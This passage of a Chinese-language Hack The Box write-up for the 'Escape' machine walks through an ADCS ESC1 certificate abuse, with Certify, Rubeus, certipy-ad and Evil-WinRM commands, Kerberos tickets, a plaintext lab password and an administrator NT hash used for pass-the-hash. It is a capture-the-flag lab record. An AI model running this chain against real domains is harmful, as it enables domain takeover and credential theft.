lTWDv8NZg4nKNYF338oIhp7sKQIBZAIBBTApBgNVHSUEIjAgBggrBgEFBQcDAgYI
KwYBBQUHAwQGCisGAQQBgjcKAwQwDgYDVR0PAQH/BAQDAgWgMDUGCSsGAQQBgjcV
CgQoMCYwCgYIKwYBBQUHAwIwCgYIKwYBBQUHAwQwDAYKKwYBBAGCNwoDBDBEBgkq
hkiG9w0BCQ8ENzA1MA4GCCqGSIb3DQMCAgIAgDAOBggqhkiG9w0DBAICAIAwBwYF
Kw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFAk5GneY/0ArBjDXPMMasi0JCbpx
MCgGA1UdEQQhMB+gHQYKKwYBBAGCNxQCA6APDA1hZG1pbmlzdHJhdG9yMB8GA1Ud
IwQYMBaAFGKfMqOg8Dgg1GDAzW3F+lEwXsMVMIHEBgNVHR8EgbwwgbkwgbaggbOg
gbCGga1sZGFwOi8vL0NOPXNlcXVlbC1EQy1DQSxDTj1kYyxDTj1DRFAsQ049UHVi
bGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlv
bixEQz1zZXF1ZWwsREM9aHRiP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFz
ZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBvQYIKwYBBQUHAQEE
gbAwga0wgaoGCCsGAQUFBzAChoGdbGRhcDovLy9DTj1zZXF1ZWwtREMtQ0EsQ049
QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNv
bmZpZ3VyYXRpb24sREM9c2VxdWVsLERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/
b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0BAQsF
AAOCAQEAC1g9DoXq2jDfozJe9HarhbRJnjYTHl01pUxtEUy20Np3JKHpFx8Hkqt7
suJaC9VWG3CFNx/yU9IODdiwthm58qiKZIlFj9Jal7yqsTLwSVBUF8Vgr3+XBovJ
YwXjMLrB2/+u/BtZdiv3ecLqd7qXXg8mRjgBvB/XG7TSUZXhw4nsFd1kbGYvIQ34
88F1PqTESycv3/q4JWEhjmDgTkDM93LZHtvx3eYP3fGeO/QsjckG9gOXwHbsrMAP
tBixxe4G9ljPojV+J1yYIZA2RFYQlrPq2nWsO1MZPwCf+Lw/1JjRil7EhTNP5IWe
6XBRe7iqXkStw9bu/E4ShlPBbJ3OgA==
-----END CERTIFICATE-----


[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx



Certify completed in 00:00:13.8547393
*Evil-WinRM* PS C:\programdata> upload /home/kali/Desktop/cert.pfx
                                        
Info: Uploading /home/kali/Desktop/cert.pfx to C:\programdata\cert.pfx
                                        
Data: 4564 bytes of 4564 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\programdata> .\Rubeus.exe asktgt /user:administrator /certificate:C:\programdata\cert.pfx

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.6.4

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\administrator'
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIGSDCCBkSgAwIBBaEDAgEWooIFXjCCBVphggVWMIIFUqADAgEFoQwbClNFUVVFTC5IVEKiHzAdoAMC
      AQKhFjAUGwZrcmJ0Z3QbCnNlcXVlbC5odGKjggUaMIIFFqADAgESoQMCAQKiggUIBIIFBLiI5JtaXpch
      gXkL7Yb9SMbbG9P/0+ZOf0JLtlF56L9IK8sNQbqIRGRQ1kqgaZE68FenXjDksVfnoviwomgBuyEn6dV3
      +57c2suwJ3p+q8regsoUgUnxwGKYEYw/aeaNN6299G1hbTberWxtCGM+mnVCXAVo/81Sremb9KWyJZ0P
      T+EqRiiFRa5KS1qzul5JNPR5zIDDagYML/jpCN3g6LKM8/Ki7/fsX8bTWrvjQt75XNNkviP0fxuWN9XG
      cpcyjk51ngoD5ZSdSwlUIjdBN8sSQYJKPegrMRnxzCz24jU1PTTioLxYgLQ3RHipuQ6zL1KVQ0VVvVSu
      0mH3gNAzeEpxw5Hg6zz+4IUKWEHJiFbIDGI6B5Fb7ZMZsvKBaZurnYkAl5e5VCbI53CaCfeWEU33qaM9
      i6dTD2dfocbYbLAa2LCJp4fyv/HOZUb9N6/IGvTm6ajvS4Oj7DOI5s8FfgnHeoFadS8hrWTLYQwzAMMx
      Ch3B4KvOtuc1WBytd4gnHT0sqtTRmvAUE1yZwLiB9P/qwLeeUI8uIyvlmojYtYn0EHRu4mvxvAV9Iv7M
      OO/Sv3iQnTd/HbNG6XTEzwgmaZJe2F/2pkB5uIugiKFTUUHtlzaXxs3zDdT64A0v8yGhnwfWz9Vg5jYP
      VPNFxXepyTnNgmMZfDahQxH5wvbUH7icfPLw9qfPw5mquL2c7OQihkfRfAgP4Oq2hXmDdfIF2gMNPSFy
      IdQgqThputqU65vzCSZ5hHTgLVwaeyhe/wp5tL6X3+TKxwixdaxPrTQGyvTdeWwAMIqFsn8UjJbbbU3N
      meKOz1EX7ZNIlHxEwJ41k47bhDvR26Z8U9/gokis+R/qQfcs1qhcnUq5HrSZnxaYMbko87hZ+vGd44la
      g8pNb3HWwVWcMjv+B5zkEkhqJNipenh4SF1zcn1k64msG9u04smkPRhEmpbXgLO1bktPKHmWVtgdEVid
      YmYUPyDiGfz9wQaFf8x2zrMIJMwoD4p6ACwNImhxupNDLtqvzYhB+UUwc5DNA/qSJBrP4PCabdS6uPPh
      n5ovykbEQ1Kpa8io0K/tnubLLeEC2s4kOh2vc788zpyhWAoVLi2a4S4yvu+4ZtbG2ccq9broxI6ZWY7h
      6dO//msSpLazpPuUbIVebtJucw4f2gJArecxYqSRRyH0Nq1VFXt23Db+bkb6QcWIohM/aNwRH7S1a0rW
      31Q2YRjRJoWwdBo1ngbfkjwC9WVPWmwzdU93e6ub6Q8EhkedT2nVuuPrnAiXiX7dn+m6xOWUE+7EbkXg
      PA7kxzlHb7BxelGXm0YpONMPESNO7nSSYHcT0ju8ZLOAdnmAt6WLmhgTCLxJK/4yqCQIZTdAhvarLEIy
      Kty7mQ/wXAE6IS+vKmQ0URXANVkOdhrBemCjvxz5XmgDzNpsKDYD9D0bUzXMetrqf69U8rbiDMR2hq+p
      wRWgasySzxxtygSGEII58shS0m1gQ77F8ip4yCR/GJsAuq64CFp9lB42hR79O+ZeQZ0zPZVfbNntgC+V
      KnU8b44cYllX+IEyVubJRpfS6XRtO3O5WRULltRCjC71sE+nyvBnBAgJ6O/23EMevtDxEHUpSkBQjzGE
      nl9JhspCO3PGLtBG2ImmJDor0kDbT/Hi44mt8qauTJnhs/nPE8fYIA/Ru0JBkqDiY0y2dsgdVtwMjQvO
      u6YFRVT2TMbfCsamn4Du2KOB1TCB0qADAgEAooHKBIHHfYHEMIHBoIG+MIG7MIG4oBswGaADAgEXoRIE
      EEfRqmpo4GQfhVf8uwRaVIqhDBsKU0VRVUVMLkhUQqIaMBigAwIBAaERMA8bDWFkbWluaXN0cmF0b3Kj
      BwMFAADhAAClERgPMjAyNDA0MjQyMjAwNDFaphEYDzIwMjQwNDI1MDgwMDQxWqcRGA8yMDI0MDUwMTIy
      MDA0MVqoDBsKU0VRVUVMLkhUQqkfMB2gAwIBAqEWMBQbBmtyYnRndBsKc2VxdWVsLmh0Yg==

  ServiceName           :  krbtgt/sequel.htb
  ServiceRealm          :  SEQUEL.HTB
  UserName              :  administrator
  UserRealm             :  SEQUEL.HTB
  StartTime             :  4/24/2024 3:00:41 PM
  EndTime               :  4/25/2024 1:00:41 AM
  RenewTill             :  5/1/2024 3:00:41 PM
  Flags                 :  name_canonicalize, pre_authent, initial, renewable
  KeyType               :  rc4_hmac
  Base64(key)           :  R9GqamjgZB+FV/y7BFpUig==

32、有用！但是，Rubeus 尝试将返回的票证直接加载到当前会话中，因此理论上，一旦我运行此命令，我就可以进入管理员的文件夹并获取标志。然而，这对 Evil-WinRM 不起作用。相反，我将使用运行相同的命令/getcredentials /show /nowrap。这将执行相同的操作，并尝试转储有关帐户的凭据信息：

*Evil-WinRM* PS C:\programdata> .\Rubeus.exe asktgt /user:administrator /certificate:C:\programdata\cert.pfx /getcredentials /show /nowrap

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.6.4

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\administrator'
[+] TGT request successful!
[*] base64(ticket.kirbi):

      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

  ServiceName           :  krbtgt/sequel.htb
  ServiceRealm          :  SEQUEL.HTB
  UserName              :  administrator
  UserRealm             :  SEQUEL.HTB
  StartTime             :  4/24/2024 3:00:58 PM
  EndTime               :  4/25/2024 1:00:58 AM
  RenewTill             :  5/1/2024 3:00:58 PM
  Flags                 :  name_canonicalize, pre_authent, initial, renewable
  KeyType               :  rc4_hmac
  Base64(key)           :  JzxniF0gg1XFlXNcrceOPg==

*Evil-WinRM* PS C:\programdata>

33、吐了，这里按理说该出现HTLM哈希才对的，但是就是不出现。。。。。。。。。。。。。。。。。。

34、算了，直接参考演练报告先把flag拿了吧

┌─[sg-vip-2]─[10.10.14.18]─[shiyan@htb-x9ixubxjci]─[~/Desktop]
└──╼ [★]$ evil-winrm -i sequel.htb -u administrator -H a52f78e4c751e5f5e17e1e9f3e58f4ee

Evil-WinRM shell v3.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
f875c34763d0a4f81e961812f2c5b01f
*Evil-WinRM* PS C:\Users\Administrator\Documents>

注：补充下最后成功的步骤（参考0xdf的命令成功了）

┌──(kali㉿offsec)-[~/Desktop]
└─$ certipy-ad find -u ryan.cooper -p NuclearMosquito3 -target sequel.htb -text -stdout -vulnerable
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'sequel-DC-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : sequel-DC-CA
    DNS Name                            : dc.sequel.htb
    Certificate Subject                 : CN=sequel-DC-CA, DC=sequel, DC=htb
    Certificate Serial Number           : 1EF2FA9A7E6EADAD4F5382F4CE283101
    Certificate Validity Start          : 2022-11-18 20:58:46+00:00
    Certificate Validity End            : 2121-11-18 21:08:46+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : SEQUEL.HTB\Administrators
      Access Rights
        ManageCa                        : SEQUEL.HTB\Administrators
                                          SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        ManageCertificates              : SEQUEL.HTB\Administrators
                                          SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        Enroll                          : SEQUEL.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : UserAuthentication
    Display Name                        : UserAuthentication
    Certificate Authorities             : sequel-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PublishToDs
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Client Authentication
                                          Secure Email
                                          Encrypting File System
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 10 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Domain Users
                                          SEQUEL.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : SEQUEL.HTB\Administrator
        Write Owner Principals          : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
        Write Dacl Principals           : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
        Write Property Principals       : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
    [!] Vulnerabilities
      ESC1                              : 'SEQUEL.HTB\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication
                          
┌──(kali㉿offsec)-[~/Desktop]
└─$ certipy-ad req -u ryan.cooper -p NuclearMosquito3 -target sequel.htb -upn administrator@sequel.htb -ca sequel-dc-ca -template UserAuthentication
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 14
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
                    
┌──(kali㉿offsec)-[~/Desktop]
└─$ certipy-ad auth -pfx administrator.pfx
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/531

打靶记

#shooting-range

Escape-htb-writeup

https://sh1yan.top/2024/04/21/Escape-htb-writeup/

作者

shiyan

发布于

2024年4月21日

许可协议

Jeeves-htb-writeup 上一篇

Soccer-htb-writeup 下一篇